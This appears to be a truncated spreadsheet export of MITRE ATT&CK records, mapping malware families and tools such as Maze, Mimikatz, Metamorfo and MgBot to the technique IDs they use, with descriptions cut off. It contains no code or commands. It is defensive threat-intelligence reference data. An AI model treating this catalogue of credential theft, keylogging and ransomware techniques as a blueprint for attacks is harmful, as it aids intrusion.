S0652 MarkiRAT malware-- software uses T1057 Process Di attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1547.001Registry Ruattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1113 Screen Capattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1518.001Security S attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1547.009Shortcut Mattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1518 Software Dattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1082 System Inf attack-pat technique [MarkiRAT]
S0652 MarkiRAT malware-- software uses T1614.001System Lanattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1033 System Own attack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1071.001Web Protocattack-pat technique [MarkiRAT](
S0652 MarkiRAT malware-- software uses T1059.003Windows Cattack-pat technique [MarkiRAT](
S0167 Matryoshkmalware-- software uses T1059 Command attack-pat
an technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1555 Credential attack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1071.004DNS attack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1055.001Dynamic-linattack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1056.001Keyloggingattack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1027 Obfuscatedattack-pat technique [Matryoshk
S0167 Matryoshkmalware-- software uses T1547.001Registry Ruattack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1218.011Rundll32 attack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1053.005Scheduled attack-pat technique [Matryoshka
S0167 Matryoshkmalware-- software uses T1113 Screen Capattack-pat technique [Matryoshka
S0449 Maze malware-- software uses T1027.001Binary Padattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1486 Data Encryattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1562.001Disable or attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1568 Dynamic Reattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1055.001Dynamic-linattack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1070 Indicator attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1490 Inhibit Sy attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1036.004Masquerade attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1218.007Msiexec attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1106 Native API attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1027 Obfuscatedattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1057 Process Di attack-pat technique [Maze](http
S0449 Maze malware-- software uses T1547.001Registry Ruattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1564.006Run Virtualattack-pat technique [Maze](http
S0449 Maze malware-- software uses T1053.005Scheduled attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1489 Service Stoattack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1082 System Inf attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1614.001System Lanattack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1049 System Netattack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1529 System Sh attack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1071.001Web Protocattack-pat technique [Maze](htt
S0449 Maze malware-- software uses T1059.003Windows Cattack-pat technique The [Maze]
S0449 Maze malware-- software uses T1047 Windows M attack-pat technique [Maze](htt
S0459 MechaFloumalware-- software uses T1041 Exfiltratio attack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1105 Ingress Tooattack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1036.005Match Legiattack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1059.006Python attack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1132.001Standard Eattack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1033 System Own attack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1071.001Web Protocattack-pat technique [MechaFlou
S0459 MechaFloumalware-- software uses T1059.003Windows Cattack-pat technique [MechaFlou
S0576 MegaCortemalware-- software uses T1134 Access Tokattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1531 Account Acattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1588.003Code Signinattack-pat technique [MegaCortex
S0576 MegaCortemalware-- software uses T1486 Data Encryattack-pat technique [MegaCortex
S0576 MegaCortemalware-- software uses T1140 Deobfuscatattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1562.001Disable or attack-pat technique [MegaCortex
S0576 MegaCortemalware-- software uses T1561.001Disk Conteattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1055.001Dynamic-linattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1083 File and Di attack-pat technique [MegaCortex
S0576 MegaCortemalware-- software uses T1490 Inhibit Sy attack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1112 Modify Regattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1106 Native API attack-pat technique After esca
S0576 MegaCortemalware-- software uses T1218.011Rundll32 attack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1489 Service Stoattack-pat technique [MegaCortex
S0576 MegaCortemalware-- software uses T1497.001System Cheattack-pat technique [MegaCorte
S0576 MegaCortemalware-- software uses T1059.003Windows Cattack-pat technique [MegaCorte
S0530 Melcoz malware-- software uses T1059.010AutoHotKey attack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1185 Browser Seattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1115 Clipboard attack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1555.003Credential attack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1574.001DLL Searchattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1105 Ingress Tooattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1204.001Malicious Lattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1218.007Msiexec attack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1027.002Software Pattack-pat technique [Melcoz](h
S0530 Melcoz malware-- software uses T1566.002Spearphishattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1565.002Transmitteattack-pat technique [Melcoz](ht
S0530 Melcoz malware-- software uses T1059.005Visual Basiattack-pat technique [Melcoz](ht
S0455 Metamorfomalware--8software uses T1010 Applicatio attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1573.002Asymmetricattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1119 Automatedattack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1115 Clipboard attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1553.002Code Signi attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1574.002DLL Side-L attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1102.001Dead Dropattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1140 Deobfuscatattack-pat technique Upon execu
S0455 Metamorfomalware--8software uses T1562.001Disable or attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1055.001Dynamic-linattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1027.013Encrypted/attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1041 Exfiltratio attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1070.004File Deleti attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1083 File and Di attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1056.002GUI Input attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1564.003Hidden Wi attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1070 Indicator attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1105 Ingress Tooattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1059.007JavaScript attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1056.001Keyloggingattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1204.002Malicious Fattack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1036.005Match Legiattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1112 Modify Regattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1218.005Mshta attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1218.007Msiexec attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1106 Native API attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1095 Non-Applicattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1571 Non-Standaattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1102.003One-Way Cattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1057 Process Di attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1547.001Registry Ruattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1113 Screen Capattack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1518.001Security S attack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1129 Shared Moattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1518 Software Dattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1027.002Software Pattack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1566.001Spearphishattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1573.001Symmetric attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1082 System Inf attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1033 System Own attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1124 System Timattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1565.002Transmitteattack-pat technique [Metamorfo]
S0455 Metamorfomalware--8software uses T1497 Virtualiza attack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1059.005Visual Basiattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1071.001Web Protocattack-pat technique [Metamorfo
S0455 Metamorfomalware--8software uses T1059.003Windows Cattack-pat technique [Metamorfo
S0688 Meteor malware-- software uses T1531 Account Acattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1070.001Clear Windattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1485 Data Destrattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1562.001Disable or attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1070.004File Deleti attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1484.001Group Poliattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1564.003Hidden Wi attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1105 Ingress Tooattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1490 Inhibit Sy attack-pat technique [Meteor](h
S0688 Meteor malware-- software uses T1491.001Internal D attack-pat technique [Meteor](h
S0688 Meteor malware-- software uses T1036.004Masquerade attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1106 Native API attack-pat technique [Meteor](h
S0688 Meteor malware-- software uses T1059.001PowerShellattack-pat technique [Meteor](h
S0688 Meteor malware-- software uses T1057 Process Di attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1053.005Scheduled attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1518.001Security S attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1489 Service Stoattack-pat technique [Meteor](h
S0688 Meteor malware-- software uses T1082 System Inf attack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1059.003Windows Cattack-pat technique [Meteor](ht
S0688 Meteor malware-- software uses T1047 Windows M attack-pat technique [Meteor](ht
S1146 MgBot malware-- software uses T1123 Audio Captattack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1115 Clipboard attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1555 Credential attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1555.003Credential attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1213 Data from attack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1005 Data from attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1025 Data from attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1087.002Domain Acattack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1482 Domain Truattack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1056.001Keyloggingattack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1087.001Local Acco attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1046 Network Seattack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1003 OS Credentattack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1057 Process Di attack-pat technique [MgBot](htt
S1146 MgBot malware-- software uses T1018 Remote Sysattack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1539 Steal Web attack-pat technique [MgBot](ht
S1146 MgBot malware-- software uses T1033 System Own attack-pat technique [MgBot](htt
S0339 Micropsia malware--8software uses T1560.001Archive viaattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1123 Audio Captattack-pat technique [Micropsia
S0339 Micropsia malware--8software uses T1119 Automatedattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1027.013Encrypted/attack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1083 File and Di attack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1564.001Hidden Fileattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1105 Ingress Tooattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1056.001Keyloggingattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1113 Screen Capattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1518.001Security S attack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1547.009Shortcut Mattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1082 System Inf attack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1033 System Own attack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1071.001Web Protocattack-pat technique [Micropsia
S0339 Micropsia malware--8software uses T1059.003Windows Cattack-pat technique [Micropsia]
S0339 Micropsia malware--8software uses T1047 Windows M attack-pat technique [Micropsia]
S1015 Milan malware-- software uses T1559.001Componentattack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1071.004DNS attack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1005 Data from attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1568.002Domain Gen attack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1036.007Double Fileattack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1027.013Encrypted/attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1070.004File Deleti attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1105 Ingress Tooattack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1087.001Local Acco attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1074.001Local Data attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1036 Masqueradattack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1106 Native API attack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1572 Protocol T attack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1012 Query Regiattack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1053.005Scheduled attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1082 System Inf attack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1016 System Netattack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1033 System Own attack-pat technique [Milan](htt
S1015 Milan malware-- software uses T1071.001Web Protocattack-pat technique [Milan](ht
S1015 Milan malware-- software uses T1059.003Windows Cattack-pat technique [Milan](htt
S0179 MimiPengutool--5a33 software uses T1003.007Proc Files attack-pat technique [MimiPengu
S0002 Mimikatz tool--afc0 software uses T1098 Account Ma attack-pat technique The [Mimik
S0002 Mimikatz tool--afc0 software uses T1555 Credential attack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1555.003Credential attack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1003.006DCSync attack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1558.001Golden Ticattack-pat technique [Mimikatz]
S0002 Mimikatz tool--afc0 software uses T1003.004LSA Secret attack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1003.001LSASS Memattack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1550.002Pass the H attack-pat technique [Mimikatz]
S0002 Mimikatz tool--afc0 software uses T1550.003Pass the Tiattack-pat technique [Mimikatz]
S0002 Mimikatz tool--afc0 software uses T1552.004Private Keyattack-pat technique [Mimikatz]
S0002 Mimikatz tool--afc0 software uses T1207 Rogue Doma attack-pat technique [Mimikatz]
S0002 Mimikatz tool--afc0 software uses T1134.005SID-Historyattack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1003.002Security A attack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1547.005Security Suattack-pat technique The [Mimik
S0002 Mimikatz tool--afc0 software uses T1558.002Silver Tickeattack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1649 Steal or Foattack-pat technique [Mimikatz](
S0002 Mimikatz tool--afc0 software uses T1555.004Windows Cattack-pat technique [Mimikatz](
S0133 Miner-C malware-- software uses T1080 Taint Shar attack-pat technique [Miner-C](h
S0051 MiniDuke malware-- software uses T1102.001Dead Dropattack-pat technique Some [MiniD
S0051 MiniDuke malware-- software uses T1568.002Domain Gen attack-pat technique [MiniDuke]
S0051 MiniDuke malware-- software uses T1008 Fallback C attack-pat technique [MiniDuke](
S0051 MiniDuke malware-- software uses T1083 File and Di attack-pat technique [MiniDuke]
S0051 MiniDuke malware-- software uses T1105 Ingress Tooattack-pat technique [MiniDuke](
S0051 MiniDuke malware-- software uses T1090.001Internal Prattack-pat technique [MiniDuke]
S0051 MiniDuke malware-- software uses T1027 Obfuscatedattack-pat technique [MiniDuke](
S0051 MiniDuke malware-- software uses T1082 System Inf attack-pat technique [MiniDuke]
S0051 MiniDuke malware-- software uses T1071.001Web Protocattack-pat technique [MiniDuke]
S0280 MirageFoxmalware--esoftware uses T1574.001DLL Searchattack-pat technique [MirageFox]
S0280 MirageFoxmalware--esoftware uses T1140 Deobfuscatattack-pat technique [MirageFox]
S0280 MirageFoxmalware--esoftware uses T1082 System Inf attack-pat technique [MirageFox]
S0280 MirageFoxmalware--esoftware uses T1033 System Own attack-pat technique [MirageFox
S0280 MirageFoxmalware--esoftware uses T1059.003Windows Cattack-pat technique [MirageFox
S0084 Mis-Type malware--esoftware uses T1547 Boot or Lo attack-pat technique [Mis-Type]
S0084 Mis-Type malware--esoftware uses T1005 Data from attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1041 Exfiltratio attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1008 Fallback C attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1105 Ingress Tooattack-pat technique [Mis-Type]
S0084 Mis-Type malware--esoftware uses T1087.001Local Acco attack-pat technique [Mis-Type]
S0084 Mis-Type malware--esoftware uses T1136.001Local Acco attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1074.001Local Data attack-pat technique [Mis-Type]
S0084 Mis-Type malware--esoftware uses T1036.005Match Legiattack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1106 Native API attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1095 Non-Applicattack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1055 Process Injattack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1132.001Standard Eattack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1082 System Inf attack-pat technique The initial
S0084 Mis-Type malware--esoftware uses T1016 System Netattack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1033 System Own attack-pat technique [Mis-Type](
S0084 Mis-Type malware--esoftware uses T1071.001Web Protocattack-pat technique [Mis-Type]
S0084 Mis-Type malware--esoftware uses T1059.003Windows Cattack-pat technique [Mis-Type]
S0083 Misdat malware-- software uses T1547 Boot or Lo attack-pat technique [Misdat](h
S0083 Misdat malware-- software uses T1070.009Clear Persiattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1005 Data from attack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1041 Exfiltratio attack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1070.004File Deleti attack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1083 File and Di attack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1105 Ingress Tooattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1036.005Match Legiattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1106 Native API attack-pat technique [Misdat](h
S0083 Misdat malware-- software uses T1095 Non-Applicattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1027.002Software Pattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1132.001Standard Eattack-pat technique [Misdat](ht
S0083 Misdat malware-- software uses T1082 System Inf attack-pat technique The initial
S0083 Misdat malware-- software uses T1614.001System Lanattack-pat technique [Misdat](h
S0083 Misdat malware-- software uses T1070.006Timestompattack-pat technique Many [Misd
S0083 Misdat malware-- software uses T1059.003Windows Cattack-pat technique [Misdat](ht
S1122 Mispadu malware-- software uses T1573.002Asymmetricattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1176 Browser Exattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1217 Browser Inattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1115 Clipboard attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1555 Credential attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1555.003Credential attack-pat technique [Mispadu](
S1122 Mispadu malware-- software uses T1140 Deobfuscatattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1027.013Encrypted/attack-pat technique [Mispadu](https://attack.mit
S1122 Mispadu malware-- software uses T1041 Exfiltratio attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1083 File and Di attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1056.002GUI Input attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1056.001Keyloggingattack-pat technique [Mispadu](
S1122 Mispadu malware-- software uses T1204.002Malicious Fattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1218.007Msiexec attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1106 Native API attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1057 Process Di attack-pat technique [Mispadu](
S1122 Mispadu malware-- software uses T1055 Process Injattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1547.001Registry Ruattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1218.011Rundll32 attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1113 Screen Capattack-pat technique [Mispadu](
S1122 Mispadu malware-- software uses T1518.001Security S attack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1566.002Spearphishattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1497.001System Cheattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1082 System Inf attack-pat technique [Mispadu](
S1122 Mispadu malware-- software uses T1614.001System Lanattack-pat technique [Mispadu](h
S1122 Mispadu malware-- software uses T1059.005Visual Basiattack-pat technique [Mispadu](h
S0080 Mivast malware--fsoftware uses T1105 Ingress Tooattack-pat technique [Mivast](ht
S0080 Mivast malware--fsoftware uses T1547.001Registry Ruattack-pat technique [Mivast](h
S0080 Mivast malware--fsoftware uses T1003.002Security A attack-pat technique [Mivast](h
S0080 Mivast malware--fsoftware uses T1059.003Windows Cattack-pat technique [Mivast](ht
S0079 MobileOrdmalware--4software uses T1217 Browser Inattack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1005 Data from attack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1041 Exfiltratio attack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1083 File and Di attack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1105 Ingress Tooattack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1057 Process Di attack-pat technique [MobileOrde
S0079 MobileOrdmalware--4software uses T1082 System Inf attack-pat technique [MobileOrde
S0553 MoleNet malware-- software uses T1105 Ingress Tooattack-pat technique [MoleNet](
S0553 MoleNet malware-- software uses T1059.001PowerShellattack-pat technique [MoleNet](h
S0553 MoleNet malware-- software uses T1547.001Registry Ruattack-pat technique [MoleNet](h
S0553 MoleNet malware-- software uses T1518.001Security S attack-pat technique [MoleNet](
S0553 MoleNet malware-- software uses T1082 System Inf attack-pat technique [MoleNet](
S0553 MoleNet malware-- software uses T1059.003Windows Cattack-pat technique [MoleNet](
S0553 MoleNet malware-- software uses T1047 Windows M attack-pat technique [MoleNet](
S1137 Moneybirdmalware-- software uses T1486 Data Encryattack-pat technique [Moneybird]
S1137 Moneybirdmalware-- software uses T1027.009Embeddedattack-pat technique [Moneybird]
S1026 Mongall malware-- software uses T1005 Data from attack-pat technique [Mongall](h
S1026 Mongall malware-- software uses T1140 Deobfuscatattack-pat technique [Mongall](h
[Mongall](https://attack.mitr
S1026 Mongall malware-- software uses T1055.001Dynamic-linattack-pat technique
S1026 Mongall malware-- software uses T1041 Exfiltratio attack-pat technique [Mongall](h
S1026 Mongall malware-- software uses T1105 Ingress Tooattack-pat technique [Mongall](h
S1026 Mongall malware-- software uses T1204.002Malicious Fattack-pat technique [Mongall](h
[Mongall](https://attack.mitr
S1026 Mongall malware-- software uses T1120 Peripheral attack-pat technique [Mongall](https://attack.mitr
S1026 Mongall malware-- software uses T1547.001Registry Ruattack-pat technique
S1026 Mongall malware-- software uses T1218.011Rundll32 attack-pat technique [Mongall](h
S1026 Mongall malware-- software uses T1027.002Software Pattack-pat technique [Mongall](
S1026 Mongall malware-- software uses T1132.001Standard Eattack-pat technique [Mongall](h
S1026 Mongall malware-- software uses T1573.001Symmetric attack-pat technique [Mongall](h
[Mongall](https://attack.mitr
S1026 Mongall malware-- software uses T1082 System Inf attack-pat technique
S1026 Mongall malware-- software uses T1071.001Web Protocattack-pat technique [Mongall](
S0149 MoonWindmalware-- software uses T1070.004File Deleti attack-pat technique [MoonWind](
S0149 MoonWindmalware-- software uses T1083 File and Di attack-pat technique [MoonWind](
S0149 MoonWindmalware-- software uses T1056.001Keyloggingattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1074.001Local Data attack-pat technique [MoonWind](
S0149 MoonWindmalware-- software uses T1095 Non-Applicattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1571 Non-Standaattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1120 Peripheral attack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1057 Process Di attack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1573.001Symmetric attack-pat technique [MoonWind](
S0149 MoonWindmalware-- software uses T1082 System Inf attack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1016 System Netattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1033 System Own attack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1124 System Timattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1059.003Windows Cattack-pat technique [MoonWind]
S0149 MoonWindmalware-- software uses T1543.003Windows Se attack-pat technique [MoonWind](
S0284 More_eggsmalware--bsoftware uses T1553.002Code Signi attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1140 Deobfuscatattack-pat technique [More_eggs
S0284 More_eggsmalware--bsoftware uses T1027.013Encrypted/attack-pat technique [More_eggs
S0284 More_eggsmalware--bsoftware uses T1070.004File Deleti attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1105 Ingress Tooattack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1016.001Internet C attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1218.010Regsvr32 attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1518.001Security S attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1132.001Standard Eattack-pat technique [More_eggs
S0284 More_eggsmalware--bsoftware uses T1573.001Symmetric attack-pat technique [More_eggs
S0284 More_eggsmalware--bsoftware uses T1082 System Inf attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1016 System Netattack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1033 System Own attack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1071.001Web Protocattack-pat technique [More_eggs]
S0284 More_eggsmalware--bsoftware uses T1059.003Windows Cattack-pat technique [More_eggs]
S1047 Mori malware-- software uses T1071.004DNS attack-pat technique [Mori](htt
S1047 Mori malware-- software uses T1140 Deobfuscatattack-pat technique [Mori](htt
